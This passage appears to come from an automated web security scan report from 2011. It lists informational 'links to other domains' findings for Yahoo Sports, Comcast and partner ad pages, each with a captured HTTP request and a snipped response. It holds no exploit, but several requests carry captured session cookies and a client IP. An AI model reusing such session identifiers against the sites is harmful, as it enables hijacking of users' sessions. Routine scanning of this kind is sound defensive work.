=~~9%26r=5316%26m=890471933%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=2a40e67557fc8f7709faa35c413b3a77" rel="nofollow" target="_blank" upstrackindex="890471933"><img src="http://i.pgcdn.com/pi/89/04/71/890471933_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Silver 11 oz" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Silver 11 oz "></a>
...[SNIP]...
=~~9%26r=5316%26m=890493007%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=395a7d8f1feb05603b7f84b45231f609" rel="nofollow" target="_blank" upstrackindex="890493007"><img src="http://i.pgcdn.com/pi/89/04/93/890493007_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Pink 11 oz" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Pink 11 oz "></a>
...[SNIP]...
=~~9%26r=5316%26m=890414279%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=0759acb26bc20550891a10874b1e6838" rel="nofollow" target="_blank" upstrackindex="890414279"><img src="http://i.pgcdn.com/pi/89/04/14/890414279_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. RED" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. RED "></a>
...[SNIP]...
=~~9%26r=5316%26m=872593161%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=970961270ed12be70b318de965698b66" rel="nofollow" target="_blank" upstrackindex="872593161"><img src="http://i.pgcdn.com/pi/87/25/93/872593161_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. GREEN" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. GREEN "></a>
...[SNIP]...
=~~9%26r=5316%26m=872613298%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=a9644e5d51b73228c236badcdbbefffa" rel="nofollow" target="_blank" upstrackindex="872613298"><img src="http://i.pgcdn.com/pi/87/26/13/872613298_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. PINK" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. PINK "></a>
...[SNIP]...
=~~9%26r=5316%26m=872538844%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=e4e68594c6bb019a3d334a477b35ad96" rel="nofollow" target="_blank" upstrackindex="872538844"><img src="http://i.pgcdn.com/pi/87/25/38/872538844_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLACK" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLACK "></a>
...[SNIP]...
=~~9%26r=5316%26m=872562517%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=c43859fd81cf5b7b6c3b8c2232ed94ab" rel="nofollow" target="_blank" upstrackindex="872562517"><img src="http://i.pgcdn.com/pi/87/25/62/872562517_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLUE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLUE "></a>
...[SNIP]...
=~~9%26r=5316%26m=872633872%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=f97daf267e11808e0a4df9388996868b" rel="nofollow" target="_blank" upstrackindex="872633872"><img src="http://i.pgcdn.com/pi/87/26/33/872633872_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. WHITE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. WHITE "></a>
...[SNIP]...
=~~9%26r=5316%26m=872738371%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=edae8afc559494c7cad653387ecd59c8" rel="nofollow" target="_blank" upstrackindex="872738371"><img src="http://i.pgcdn.com/pi/87/27/38/872738371_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLACK" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLACK "></a>
...[SNIP]...
<div class="dittoimg">
<img src="http://cr0.worthathousandwords.com/8/08/D0/21C5D99D0F144848B711CBB0088.jpg?pid=9146.106&qs=yvF%7Czt%25vkxrl%27fjyF%7B%7Ex3IdkplEjgoOmuejx1lst%27yzoFTopsk%23Xjmfwy%23rr%27Zt%7Bu%29Eyff%2CgnwDTf%7Ch%29Qvoj%7F%23%C2%803%27Tukfres%21Tlinvz%21%2B%26Ox%7B%27Sfzh%7C2%27Dmkft%24mpw%26Vnv%7Djhk%23%5Dskb%7E%27"></div>
...[SNIP]...
<div class="dittoimg">
<img src="http://cr0.worthathousandwords.com/0/44/D5/FE7138D353BA530D599B6C8E533.jpg?pid=9146.106&qs=yvF%7Czt%25vkxrl%27fjyFRvCnro%3D%5Dvv3irv%2A%7BuqCWqi%27Cjyw%29Olqy%26Vngyfy%27%29miz%3EIovls%7Dfw%26wqi%27cjyw%29olqy%26vngyfy%26lw%24%7Bij%26fnps%21unrwi%27jsjx%7Cxyz%26"></div>
...[SNIP]...
<a target="_href" href="http://help.yahoo.com/l/us/yahoo/shopping/new/shop-138.html"><img src="http://l.yimg.com/a/i/us/sh/gr/help_icon.gif"></a>
...[SNIP]...
</p><img src="http://iare.worthathousandwords.com/iar.gif?pid=9146.106">
<!-- http://global.ard.yahoo.com/SIG=15orsrspe/M=289534.14692504.14474040.14080610/D=shp/S=14489115:FOOT9/_ylt=AiJ6UN7kVqv4ov3YBDwZ.c4bFt0A/Y=YAHOO/EXP=1315320598/L=Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvY
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ono/ywa.js"></script>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js&shop/s2/sh_listing_201010132254.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ts83sd(gid$Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvYAAdMa,st$1315313398170748,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.95. http://show.partners-z.com/s/show

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /s/show

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /s/show?chan=YAHOO&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010 HTTP/1.1
Host: show.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:53 GMT
Server: Apache/2.2.9 (Debian)
Cache-Control: max-age=0, no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3691
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Advertisement</title>
<style type="text/css" media="screen, projection">
html{border:0;margin:0;padding:0;width:300px;height:200px;background-color
...[SNIP]...
<div class="image"><img style="height:76;width:101;" src="http://www.zillowstatic.com/static/images/showcase-ads-thumb/See-what-Agents-are-saying-about-Premier-2.jpg"></img>
...[SNIP]...
<div class="image"><img style="height:76;width:101;" src="http://www.zillowstatic.com/static/images/showcase-ads-thumb/Agents-Get-more-customers-today.jpg"></img>
...[SNIP]...

15.96. http://sitesearch.comcast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:11 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18478
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
</span> Comcast
       |
       <a target="_blank" href="http://www.cmcsk.com/">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>
...[SNIP]...

15.97. http://sports.yahoo.com/mlb/recap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /mlb/recap

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; spt_site=scorethin_league=nascar

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 247599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Lee tosses another gem, shuts out Braves - MLB - Yahoo! Sports</title>
<meta http-e
...[SNIP]...
e (16-7) struck out six, walked none and needed only 100 pitches to finish off the Braves after falling one out shy of a shutout in his previous start at Cincinnati. - Major League Baseball news"/>

<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJx1j-FuhCAQhJ9IBQ8R0ochFPZ6JMqaXWzj21fFJueP_loyfLszE5i7bU1d39pWdAQMpXliLtx8UYrckhxHo_VH2DlOBX5SBJf9t3uBj0DuiViAdsxIpcaKLUiFq2QepxRwnjF3n55h14dxGC4UPIWX88yJSzennOrT9UJYYXoh9cMcG1rL_v3SxkszY_ybp5m25j8kBcy3jBezTH4DynuFs6ky4pY3Jg4T8kpnaiWNff8NnnBlmI5NbW3Ndzjxzap6uFr1Cqp-ARhQf5A,.css?z&m" />
<link type="text/css" rel="stylesheet" media="screen" href="http://l.yimg.com/j/assets/eJx1kWFuhCAQhU9kFUTE9DAGcbaQRccA1t3bF7CNbuP-gfDm483kjfK-hMcCLvgPR1hNKflUUfMKHQRt5qgKwlibVemCURautHLT2G_G2njkTxXt6Avg19imD3qdhtSr5TUVGVA4TTiXAdEO0sUSb0hdn0vpgvnfiN9mBExGouK70Q1kWB2M_WDxy-cpq2o3Woy6w9TDaAK6Pr1Snbes7Q6zcpReF4uVT3C-fPqlOAupFe1qeh4sMROO-R7wkVN7SeeC81o6KIKG4sBrwfbYURlp-2ENAefUsRGckXdOSoO6_66IN-wdduxXkMi9w_5CiV6duILmm02Zka7ZM9hQ6rxpIZofX1TKEA,,.css?z&m" />
<link type="text/css" rel="stylesheet" media="print" href="http://l.yimg.com/j/assets/print_css/article.r180433.css?m" />

<script>
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Lee tosses another gem, shuts out Braves" />
<link rel="image_src" href="http://d.yimg.com/a/p/sp/ap/8c/fullj.973bbbfdd26a86f708a9677286fb4471/ap-201109052136777777842.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/mlb/recap?gid=310905122" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/mlb/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/media/phugc/mwphcom_r141.css&d/lib/yui/2.9.0/build/container/assets/skins/sam/container.css&d/lib/yui/2.9.0/build/fonts/fonts-min.css&d/lib/yui/2.9.0/build/reset/reset-min.css" />

<STYLE>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
<div id="ad-347035" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
<span rel="rdfs:seeAlso media:image"><img src="http://l.yimg.com/iu/api/res/1.2/aWkbF0HZtfE_Si7JPTSZuw--/YXBwaWQ9eXZpZGVvO2NoPTQ0MDtjcj0xO2N3PTM5NjtkeD0yMztkeT0xO2ZpPXVsY3JvcDtoPTIwMDtxPTcwO3c9MTgw/http://d.yimg.com/a/p/sp/ap/8c/fullj.973bbbfdd26a86f708a9677286fb4471/ap-201109052136777777842.jpg" class="photo photo0" title="Atlanta Braves starting pitcher Derek Lowe returns to the mound after Philadelphia Phillies Carlos Ruiz hit a two-run single during the fifth inning of a baseball game, Monday, Sept. 5, 2011, in Philadelphia. The Phillies won 9-0." alt="Atlanta Braves starting pitcher Derek Lowe returns to the mound after Philadelphia Phillies Carlos Ruiz hit a two-run single during the fifth inning of a baseball game, Monday, Sept. 5, 2011, in Philadelphia. The Phillies won 9-0." width="180" height="200"></span>
...[SNIP]...
<div id="ad-289494" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-digg}-->
<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&title=Lee+tosses+another+gem%2C+shuts+out+Braves&ts=1315313420" class="digg" title="Digg.com" target="_new">digg</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-facebook}-->
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&title=Lee+tosses+another+gem%2C+shuts+out+Braves&ts=1315313420" class="facebook" title="Facebook" target="_new">add to facebook</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-twitter}-->
<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122" class="twitter" title="Twitter" target="_new">Twitter</a>
...[SNIP]...
19/L=dddWQ2KIPE5nMaBQTmYXCQNZMhd7ak5mFwsACfgp/B=gjixMEoGYvY-/J=1315313419813817/K=pywGN4.njdLouHcchC7aSQ/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YZHWC2AIHDS6QMBAYQABS3OWZ4">

<img id="com_14641418_YZHWC2AIHDS6QMBAYQABS3OWZ4" class="imageloader_classname" width="48" height="48" alt="Phillies" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4de5620eie26zws105ac4/DZRPh9E8fqjEVO9s7uRuug--/10/tn48.jpeg?ciAa60QBDxe1fC8j);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_RBTM76PODXKCIIBYWXIGYCVX24">

<img id="com_14640890_RBTM76PODXKCIIBYWXIGYCVX24" class="imageloader_classname" width="48" height="48" alt="Eric Dobson" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_TKHY2OJ4VF7WLMUTQAFZCP4JIY">

<img id="com_14640453_TKHY2OJ4VF7WLMUTQAFZCP4JIY" class="imageloader_classname" width="48" height="48" alt="Rich G" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IAE7TUU7QJ6SMMZC66R3V7MJ2E">

<img id="com_14640404_IAE7TUU7QJ6SMMZC66R3V7MJ2E" class="imageloader_classname" width="48" height="48" alt="Bob" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_H5LPNNDS7HRHNKF3ZDRV6I56FM">

<img id="com_14640124_H5LPNNDS7HRHNKF3ZDRV6I56FM" class="imageloader_classname" width="48" height="48" alt="Yankeefanforever" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_2G6JUXLJEH3NZ5DYFZGB5MGTLY">

<img id="com_14640065_2G6JUXLJEH3NZ5DYFZGB5MGTLY" class="imageloader_classname" width="48" height="48" alt="Bruce Jones" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1286hmg4h(gid$dddWQ2KIPE5nMaBQTmYXCQNZMhd7ak5mFwsACfgp,st$1315313419773956,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.98. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r3.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 290067

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Yahoo! Sports - National Football League News" href="/nfl/rss.xml">

<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJx1j-FuhCAQhJ9IBQ8R0ochFPZ6JMqaXWzj21fFJueP_loyfLszE5i7bU1d39pWdAQMpXliLtx8UYrckhxHo_VH2DlOBX5SBJf9t3uBj0DuiViAdsxIpcaKLUiFq2QepxRwnjF3n55h14dxGC4UPIWX88yJSzennOrT9UJYYXoh9cMcG1rL_v3SxkszY_ybp5m25j8kBcy3jBezTH4DynuFs6ky4pY3Jg4T8kpnaiWNff8NnnBlmI5NbW3Ndzjxzap6uFr1Cqp-ARhQf5A,.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxtUOlugzAMfqJ1hOYA7WGiNDEQLQeKQzvefiFUAqb9svSdtjXi5wAqLwmMfLg44i2RjjTN_UsXCn5mSHnD6L1tScWm6EE6UAZzTKt8u6uv6Xl_aHw0i9sJwsQeqKP3MZSxhGziKxRScCb25BI6LiBRT7A5L62DClnhegmlVJx8tRNn0Haw-qQTXcO7qntaA_GC5KT0N6RLmtJyKtc5G_7UoI4J8mTDVR7wBQnlQ5kRJLnRrUAIyirr1_M5x4Pef1hx_iib1nn8uiOEs_9kYXCF5qRn7S-GjZe9.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxVkGuOwyAMhE_UPIEQ9TCRQ5wWieIKk-329suj0qa_kPzNMGMb5vZ92HZo5qZrAzLGy04-8uUW7MZN6KdJK3U1SWfo8SDfrsCY5nKScirzf79JTrAeQ_HNw1j46ui24G_E4MEtd4StCtQo6gdsI77shouHnw9fdqJYZLoXH9nTwTsRRgjmXoiaRSE7QjwCbkuO4oK6bjyXzg-mtRIT4zD0ZxaJ3Ao5S8l-rDYI0RqHX_n589xbT2I--2svn_qWewn9Hb1ZNo449ctXE72uZiZj0znWI0by2Si1ErXXi6Ds12kt_wDHPo2P.css?z&m" />
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/j/assets/eJx1kO2KwyAQRZ8oSZP6SR9GrJm0gjrFMV3y9qspyyaw-0s491wujiMattUPU6_7y5CBoHQLpkLdI_uZ-jxKqYS4ueo5jBHTcLcElXPJuTxyZzOuBKF1hNbTMfvyc-uw6zSNR77Rq4s4_7xVUaPQ6j-lgI27w5j8y0lLWxej5p_1J0YwNVgD0N7j8vobBLAzFcybWcCWNX-cixZ6d7zDRKc18gXaT0yyb_OsbchmQSyQT5rNxbsAJ3YP-GiHUZLp2yv7VMwBM6mY-gYK3IZE.css?z&m" />
<script>
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

